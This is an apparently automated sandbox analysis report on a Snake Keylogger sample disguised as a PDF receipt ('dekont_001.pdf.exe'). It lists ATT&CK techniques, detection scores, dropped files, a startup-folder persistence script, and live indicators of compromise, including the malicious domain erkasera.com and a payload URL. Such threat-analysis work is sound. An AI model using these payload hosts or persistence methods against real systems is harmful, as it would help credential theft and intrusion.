Credentials	Domains	Default Accounts	Scheduled Task/Job	1 DLL Side-Loading	11 Process Injection	1 Deobfuscate/Decode Files or Information	LSASS Memory	13 System Information Discovery	Remote Desktop Protocol	1 Data from Local System	11 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	1 Scheduled Task/Job	1 Scheduled Task/Job	121 Obfuscated Files or Information	Security Account Manager	21 Security Software Discovery	SMB/Windows Admin Shares	1 Email Collection	2 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	2 Registry Run Keys / Startup Folder	2 Registry Run Keys / Startup Folder	2 Software Packing	NTDS	1 Process Discovery	Distributed Component Object Model	Input Capture	13 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 DLL Side-Loading	LSA Secrets	31 Virtualization/Sandbox Evasion	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	11 Masquerading	Cached Domain Credentials	1 Application Window Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	31 Virtualization/Sandbox Evasion	DCSync	1 System Network Configuration Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	11 Process Injection	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label
dekont_001.pdf.exe	39%	ReversingLabs	Win32.Trojan.Generic
dekont_001.pdf.exe	100%	Avira	HEUR/AGEN.1309900
dekont_001.pdf.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
C:\Users\user\AppData\Roaming\RequiredContract.exe	100%	Avira	HEUR/AGEN.1309900
C:\Users\user\AppData\Roaming\RequiredContract.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Roaming\RequiredContract.exe	37%	ReversingLabs	Win32.Trojan.Generic

Source	Detection	Scanner	Label
http://checkip.dyndns.org/	0%	URL Reputation	safe
https://stackoverflow.com/q/14436606/23354	0%	URL Reputation	safe
https://stackoverflow.com/q/11564914/23354;	0%	URL Reputation	safe
https://stackoverflow.com/q/2152978/23354	0%	URL Reputation	safe
http://checkip.dyndns.org/q	0%	URL Reputation	safe
http://reallyfreegeoip.org	0%	URL Reputation	safe
https://reallyfreegeoip.org	0%	URL Reputation	safe
http://checkip.dyndns.org	0%	URL Reputation	safe
http://checkip.dyndns.com	0%	URL Reputation	safe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	0%	URL Reputation	safe
https://reallyfreegeoip.org/xml/	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
erkasera.com	188.132.193.46	true	false	unknown
reallyfreegeoip.org	188.114.97.3	true	true	unknown
checkip.dyndns.com	132.226.247.73	true	false	unknown
checkip.dyndns.org	unknown	unknown	true	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://checkip.dyndns.org/	false	URL Reputation: safe	unknown
https://erkasera.com/ruurew/Ktanfonto.vdf	false		unknown
https://reallyfreegeoip.org/xml/155.94.241.188	false		unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://erkasera.com	dekont_001.pdf.exe, 00000000.00000002.1830048122.0000000002831000.00000004.00000800.00020000.00000000.sdmp, RequiredContract.exe, 00000006.00000002.2012152493.00000000031E1000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://github.com/mgravell/protobuf-neti	dekont_001.pdf.exe, 00000000.00000002.1844825220.00000000067D0000.00000004.08000000.00040000.00000000.sdmp	false		unknown
https://stackoverflow.com/q/14436606/23354	dekont_001.pdf.exe, 00000000.00000002.1844825220.00000000067D0000.00000004.08000000.00040000.00000000.sdmp, dekont_001.pdf.exe, 00000000.00000002.1830048122.00000000028DF000.00000004.00000800.00020000.00000000.sdmp, RequiredContract.exe, 00000006.00000002.2012152493.000000000328F000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://github.com/mgravell/protobuf-netJ	dekont_001.pdf.exe, 00000000.00000002.1844825220.00000000067D0000.00000004.08000000.00040000.00000000.sdmp	false		unknown
https://stackoverflow.com/q/11564914/23354;	dekont_001.pdf.exe, 00000000.00000002.1844825220.00000000067D0000.00000004.08000000.00040000.00000000.sdmp	false	URL Reputation: safe	unknown
https://stackoverflow.com/q/2152978/23354	dekont_001.pdf.exe, 00000000.00000002.1844825220.00000000067D0000.00000004.08000000.00040000.00000000.sdmp	false	URL Reputation: safe	unknown
http://checkip.dyndns.org/q	dekont_001.pdf.exe, 00000000.00000002.1839865872.00000000038BB000.00000004.00000800.00020000.00000000.sdmp, dekont_001.pdf.exe, 00000000.00000002.1839865872.0000000003838000.00000004.00000800.00020000.00000000.sdmp, dekont_001.pdf.exe, 00000000.00000002.1830048122.0000000002CB9000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.4212250311.0000000000402000.00000040.00000400.00020000.00000000.sdmp, RequiredContract.exe, 00000006.00000002.2012152493.000000000364C000.00000004.00000800.00020000.00000000.sdmp, RequiredContract.exe, 00000006.00000002.2023138995.000000000426A000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://reallyfreegeoip.org	InstallUtil.exe, 00000001.00000002.4215771932.000000000300B000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.4215771932.0000000002F67000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.4215771932.0000000003038000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.4215771932.0000000002FFD000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.4215771932.0000000002FE2000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.4215771932.0000000002FF0000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.4215341701.0000000002C82000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.4215341701.0000000002C46000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.4215341701.0000000002C2B000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.4215341701.0000000002C54000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.4215341701.0000000002C90000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.4215341701.0000000002C39000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.4215341701.0000000002BB0000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://github.com/mgravell/protobuf-net	dekont_001.pdf.exe, 00000000.00000002.1844825220.00000000067D0000.00000004.08000000.00040000.00000000.sdmp	false		unknown
https://reallyfreegeoip.org	InstallUtil.exe, 00000001.00000002.4215771932.000000000300B000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.4215771932.0000000003038000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.4215771932.0000000002FFD000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.4215771932.0000000002F4F000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.4215771932.0000000002FE2000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.4215771932.0000000002FF0000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.4215771932.0000000002F92000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.4215341701.0000000002BDB000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.4215341701.0000000002C82000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.4215341701.0000000002C46000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.4215341701.0000000002C2B000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.4215341701.0000000002B98000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.4215341701.0000000002C54000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.4215341701.0000000002C90000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.4215341701.0000000002C39000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://checkip.dyndns.org	InstallUtil.exe, 00000001.00000002.4215771932.0000000002E91000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.4215771932.0000000003019000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.4215771932.000000000300B000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.4215771932.0000000003038000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.4215771932.0000000002FFD000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.4215771932.0000000002F4F000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.4215771932.0000000002FE2000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.4215771932.0000000002FF0000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.4215771932.0000000002F92000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.4215341701.0000000002BDB000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.4215341701.0000000002C82000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.4215341701.0000000002C46000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.4215341701.0000000002C2B000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.4215341701.0000000002B98000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.4215341701.0000000002C54000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.4215341701.0000000002C90000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.4215341701.0000000002C62000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.4215341701.0000000002B8C000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.4215341701.0000000002C39000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://checkip.dyndns.com	InstallUtil.exe, 00000001.00000002.4215771932.000000000300B000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.4215771932.0000000003038000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.4215771932.0000000002FFD000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.4215771932.0000000002F4F000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.4215771932.0000000002FE2000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.4215771932.0000000002FF0000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.4215341701.0000000002C82000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.4215341701.0000000002C46000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.4215341701.0000000002C2B000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.4215341701.0000000002B98000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.4215341701.0000000002C54000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.4215341701.0000000002C90000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.4215341701.0000000002C39000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://reallyfreegeoip.org/xml/155.94.241.188$	InstallUtil.exe, 00000001.00000002.4215771932.000000000300B000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.4215771932.0000000003038000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.4215771932.0000000002FFD000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.4215771932.0000000002FE2000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.4215771932.0000000002FF0000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.4215771932.0000000002F92000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.4215341701.0000000002BDB000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.4215341701.0000000002C82000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.4215341701.0000000002C46000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.4215341701.0000000002C2B000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.4215341701.0000000002C54000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.4215341701.0000000002C90000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.4215341701.0000000002C39000.00000004.00000800.00020000.00000000.sdmp	false		unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	dekont_001.pdf.exe, 00000000.00000002.1830048122.0000000002831000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.4215771932.0000000002E91000.00000004.00000800.00020000.00000000.sdmp, RequiredContract.exe, 00000006.00000002.2012152493.00000000031E1000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.4215341701.0000000002AD1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://reallyfreegeoip.org/xml/	dekont_001.pdf.exe, 00000000.00000002.1839865872.00000000038BB000.00000004.00000800.00020000.00000000.sdmp, dekont_001.pdf.exe, 00000000.00000002.1839865872.0000000003838000.00000004.00000800.00020000.00000000.sdmp, dekont_001.pdf.exe, 00000000.00000002.1830048122.0000000002CB9000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.4212250311.0000000000402000.00000040.00000400.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.4215771932.0000000002F4F000.00000004.00000800.00020000.00000000.sdmp, RequiredContract.exe, 00000006.00000002.2012152493.000000000364C000.00000004.00000800.00020000.00000000.sdmp, RequiredContract.exe, 00000006.00000002.2023138995.000000000426A000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.4215341701.0000000002B98000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
188.132.193.46	erkasera.com	Turkey	42910	PREMIERDC-VERI-MERKEZI-ANONIM-SIRKETIPREMIERDC-SHTR	false
188.114.97.3	reallyfreegeoip.org	European Union	13335	CLOUDFLARENETUS	true
132.226.247.73	checkip.dyndns.com	United States	16989	UTMEMUS	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1544052
Start date and time:	2024-10-28 19:03:08 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 9m 35s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	9
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	dekont_001.pdf.exe
Detection:	MAL
Classification:	mal100.troj.spyw.expl.evad.winEXE@8/3@3/3
EGA Information:	Successful, ratio: 25%
HCA Information:	Successful, ratio: 95% Number of executed functions: 345 Number of non-executed functions: 53
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target InstallUtil.exe, PID 8028 because it is empty
Execution Graph export aborted for target RequiredContract.exe, PID 7844 because it is empty
Execution Graph export aborted for target dekont_001.pdf.exe, PID 7304 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: dekont_001.pdf.exe

Simulations

Behavior and APIs

Time	Type	Description
14:04:05	API Interceptor	70x Sleep call for process: dekont_001.pdf.exe modified
14:04:17	API Interceptor	14429746x Sleep call for process: InstallUtil.exe modified
14:04:24	API Interceptor	64x Sleep call for process: RequiredContract.exe modified
18:04:15	Autostart	Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\RequiredContract.vbs

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
188.132.193.46	dekont_001.pdf.exe	Get hash	malicious	Snake Keylogger	Browse
	PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Get hash	malicious	DarkCloud	Browse
	Contact Form and Delivery Details.png.lnk	Get hash	malicious	Unknown	Browse
	Maersk Shipping Document.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse
	Maersk Shipping Document.com.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse
188.114.97.3	PbfYaIvR5B.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	windowsxp.top/ExternaltoPhppollcpuupdateTrafficpublic.php
	SR3JZpolPo.exe	Get hash	malicious	JohnWalkerTexasLoader	Browse	xilloolli.com/api.php?status=1&wallets=0&av=1
	5Z1WFRMTOXRH6X21Z8NU8.exe	Get hash	malicious	Unknown	Browse	artvisions-autoinsider.com/8bkjdSdfjCe/index.php
	PO 4800040256.exe	Get hash	malicious	FormBook	Browse	www.cc101.pro/4hfb/
	QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe	Get hash	malicious	Snake Keylogger	Browse	filetransfer.io/data-package/cDXpxO66/download
	Instruction_1928.pdf.lnk.download.lnk	Get hash	malicious	LummaC	Browse	tech-tribune.shop/pLQvfD4d5/index.php
	WBCDZ4Z3M2667YBDZ5K4.bin.exe	Get hash	malicious	Unknown	Browse	tech-tribune.shop/pLQvfD4d5/index.php
	yGktPvplJn.exe	Get hash	malicious	Pushdo	Browse	www.rs-ag.com/
	https://is.gd/6NgVrQ	Get hash	malicious	HTMLPhisher	Browse	aa.opencompanies.co.uk/vEXJm/
	Comprobante de pago.xlam.xlsx	Get hash	malicious	Unknown	Browse	paste.ee/d/KXy1F
132.226.247.73	Fa24c148.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	checkip.dyndns.org/
	z1RECONFIRMPAYMENTINVOICE.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	checkip.dyndns.org/
	na.doc	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	na.doc	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	na.doc	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	n#U00ba 7064-2024.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	checkip.dyndns.org/
	SOLICITUD URGENTE RFQ-05567.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	PILNE ZAPYTANIE RFQ-05567-2024.10.25.vbs	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	22390016593_20210618_14375054_HesapOzeti.pdf.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
reallyfreegeoip.org	z74fBF2ObiS1g87mbS.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.96.3
	come.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	188.114.97.3
	INVOICE.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger	Browse	188.114.97.3
	QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.96.3
	z19UrgentOrder.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	188.114.97.3
	Fa24c148.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	188.114.97.3
	#U304a#U898b#U7a4d#U308a#U4f9d#U983c.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger	Browse	188.114.97.3
	RFQ_List.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	188.114.97.3
	z1RECONFIRMPAYMENTINVOICE.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	188.114.96.3
	AWB#21138700102.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
checkip.dyndns.com	z74fBF2ObiS1g87mbS.exe	Get hash	malicious	Snake Keylogger	Browse	158.101.44.242
	come.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	132.226.8.169
	INVOICE.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger	Browse	132.226.8.169
	QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe	Get hash	malicious	Snake Keylogger	Browse	158.101.44.242
	z19UrgentOrder.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	193.122.6.168
	Fa24c148.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	132.226.247.73
	RFQ_List.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	158.101.44.242
	z1RECONFIRMPAYMENTINVOICE.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	132.226.247.73
	AWB#21138700102.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	132.226.8.169
	z45paymentadvice.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	158.101.44.242
erkasera.com	dekont_001.pdf.exe	Get hash	malicious	Snake Keylogger	Browse	188.132.193.46
erkasera.com	PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Get hash	malicious	DarkCloud	Browse	188.132.193.46

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	https://myworkspacec1d73.myclickfunnels.com/onlinereview--9097d?preview=true	Get hash	malicious	Unknown	Browse	104.18.35.212
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	172.64.41.3
	file.exe	Get hash	malicious	LummaC	Browse	188.114.96.3
	https://link.edgepilot.com/s/b064b0de/7_W48d8I8kGlXhrfD-hDUg?u=https://delivmodas.ks.infinitoag.com/	Get hash	malicious	Unknown	Browse	104.18.11.207
	6B530627-1802-4180-83E0-9D13C1074460.1_originalmail.eml	Get hash	malicious	Unknown	Browse	1.1.1.1
	https://docs.google.com/drawings/d/1O7L6jnunpKYYRy1ZXX5DN4ENeZ4pxxWF8BG0mcDdFi0/preview?pli=1ZjRsxVenbNRU0UorX7OKjJa9aCYWGEkzuOVKWWWAgOafkEScU8ZjRsxVenbNRU0UorX7OKjJa9aCYWGEkzuOVKWWWAgOafkEScU8ZjRsxVenbNRU0UorX7OKjJa9aCYWGEkzuOVKWWWAgOafkEScU8ZjRsxVenbNRU0UorX7OKjJa9aCYWGEkzuOVKWWWAgOafkEScU8ZjRsxVenbNRU0UorX7OKjJa9aCYWGEkzuOVKWWWAgOafkEScU8ZjRsxVenbNRU0UorX7OKjJa9aCYWGEkzuOVKWWWAgOafkEScU8ZjRsxVenbNRU0UorX7OKjJa9aCYWGEkzuOVKWWWAgOafkEScU8ZjRsxVenbNRU0UorX7OKjJa9aCYWGEkzuOVKWWWAgOafkEScU8ZjRsxVenbNRU0UorX7OKjJa9aCYWGEkzuOVKWWWAgOafkEScU8ZjRsxVenbNRU0UorX7OKjJa9aCYWGEkzuOVKWWWAgOafkEScU8ZjRsxVenbNRU0UorX7OKjJa9aCYWGEkzuOVKWWWAgOafkEScU8ZjRsxVenbNRU0UorX7OKjJa9aCYWGEkzuOVKWWWAgOafkEScU8ZjRsxVenbNRU0UorX7OKjJa9aCYWGEkzuOVKWWWAgOafkEScU8ZjRsxVenbNRU0UorX7OKjJa9aCYWGEkzuOVKWWWAgOafkEScU8ZjRsxVenbNRU0UorX7OKjJa9aCYWGEkzuOVKWWWAgOafkEScU8ZjRsxVenbNRU0UorX7OKjJa9aCYWGEkzuOVKWWWAgOafkEScU8ZjRsxVenbNRU0UorX7OKjJa9aCYWGEkzuOVKWWWAgOafkEScU8ZjRsxVenbNRU0UorX7OKjJa9aCYWGEkzuOVKWWWAgOafkEScU8ZjRsxVenbNRU0UorX7OKjJa9aCYWGEkzuOVKWWWAgOafkEScU8ZjRsxVenbNRU0UorX7OKjJa9aCYWGEkzuOVKWWWAgOafkEScU8ZjRsxVenbNRU0UorX7OKjJa9aCYWGEkzuOVKWWWAgOafkEScU8ZjRsxVenbNRU0UorX7OKjJa9aCYWGEkzuOVKWWWAgOafkEScU8ZjRsxVenbNRU0UorX7OKjJa9aCYWGEkzuOVKWWWAgOafkEScU8ZjRsxVenbNRU0UorX7OKjJa9aCYWGEkzuOVKWWWAgOafkEScU8ZjRsxVenbNRU0UorX7OKjJa9aCYWGEkzuOVKWWWAgOafkEScU8ZjRsxVenbNRU0UorX7OKjJa9aCYWGEkzuOVKWWWAgOafkEScU8ZjRsxVenbNRU0UorX7OKjJa9aCYWGEkzuOVKWWWAgOafkEScU8ZjRsxVenbNRU0UorX7OKjJa9aCYWGEkzuOVKWWWAgOafkEScU8ZjRsxVenbNRU0UorX7OKjJa9aCYWGEkzuOVKWWWAgOafkEScU8ZjRsxVenbNRU0UorX7OKjJa9aCYWGEkzuOVKWWWAgOafkEScU8ZjRsxVenbNRU0UorX7OKjJa9aCYWGEkzuOVKWWWAgOafkEScU8ZjRsxVenbNRU0UorX7OKjJa9aCYWGEkzuOVKWWWAgOafkEScU8ZjRsxVenbNRU0UorX7OKjJa9aCYWGEkzuOVKWWWAgOafkEScU8ZjRsxVenbNRU0UorX7OKjJa9aCYWGEkzuOVKWWWAgOafkEScU8ZjRsxVenbNRU0UorX7OKjJa9aCYWGEkzuOVKWWWAgOafkEScU8ZjRsxVenbNRU0UorX7OKjJa9aCYWGEkzuOVKWWWAgOafkEScU8ZjRsxVenbNRU0UorX7OKjJa9aCYWGEkzuOVKWWWAgOafkEScU8ZjRsxVenbNRU0UorX7OKjJa9aCYWGEkzuOVKWWWAgOafkEScU8ZjRsxVe	Get hash	malicious	HTMLPhisher	Browse	104.21.49.204
	renier_visser-In Employee -11384.pdf	Get hash	malicious	Unknown	Browse	104.17.25.14
	https://www-suasconsult-com-br.translate.goog/?_x_tr_sl=pt&_x_tr_tl=en&_x_tr_hl=en&_x_tr_pto=sc	Get hash	malicious	Unknown	Browse	188.114.96.3
	z74fBF2ObiS1g87mbS.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.96.3
	file.exe	Get hash	malicious	LummaC	Browse	188.114.96.3
PREMIERDC-VERI-MERKEZI-ANONIM-SIRKETIPREMIERDC-SHTR	nabm68k.elf	Get hash	malicious	Unknown	Browse	188.132.241.224
	dekont_001.pdf.exe	Get hash	malicious	Snake Keylogger	Browse	188.132.193.46
	PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Get hash	malicious	DarkCloud	Browse	188.132.193.46
	DRUMMONDLTD _ 21ST_OCTOBER_2024 _.PDF	Get hash	malicious	Unknown	Browse	78.135.79.21
	https://t.ly/k1aDE	Get hash	malicious	HTMLPhisher, Mamba2FA	Browse	78.135.79.21
	voicemai____Now_AUD__autoresponse(9.htm	Get hash	malicious	Phisher	Browse	188.132.193.30
	Swift E-Posta Bildirimi_2024-09-23_T11511900.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.132.158.64
